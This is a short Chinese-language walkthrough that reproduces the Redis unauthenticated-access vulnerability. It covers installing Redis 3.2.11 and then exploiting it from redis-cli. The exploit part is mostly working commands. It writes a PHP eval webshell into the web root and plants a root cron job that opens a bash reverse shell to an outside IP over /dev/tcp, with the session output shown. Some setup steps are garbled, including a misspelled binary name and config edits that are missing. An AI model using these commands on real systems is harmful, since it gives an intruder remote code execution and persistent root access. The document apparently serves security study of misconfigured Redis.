漏洞產生原因
網絡管理員安裝Redis,沒有修改默認端口,沒有設置密碼。
環境搭建
//下載壓縮包
wget http://download.redis.io/releases/redis-3.2.11.tar.gz
//解壓
tar xzf redis-3.2.11.tar.gz
//進入解壓目錄
cd redis-3.2.11
make
//進入src目錄
cd src
//拷貝redis-server到/usr/bin
cp redis-serrver /usr/bin
//拷貝redis-cli到/usr/bin
cp redis-cli /usr/bin
cd..
//拷貝redis.conf到/etc/
cp redis.conf /etc
//編輯redis文件允許遠程登錄redis
vi /etc/redis.conf
前面加#註釋:
關閉保護:
//啓動
redis-server /etc/redis.conf
復現
這裏使用win進行測試,打開cmd輸入以下命令:
redis-cli.exe -h 192.168.10.32
//查看redis信息及服務器信息
info
連接成功
//寫入小馬
set one "\n\n\n<?php @eval($_POST['c']);?>\n\n\n"
config set dir /var/www/html/
config set dbfilename w.php
//反彈shell
192.168.31.62:6379> set x "\n* * * * * bash -i >& /dev/tcp/192.168.31.117/7999 0>&1\n"
OK
192.168.31.62:6379> config set dir /var/spool/cron/
OK
192.168.31.62:6379> config set dbfilename root
OK
192.168.31.62:6379> save
參考文獻:https://blog.csdn.net/qq_36119192/article/details/84620648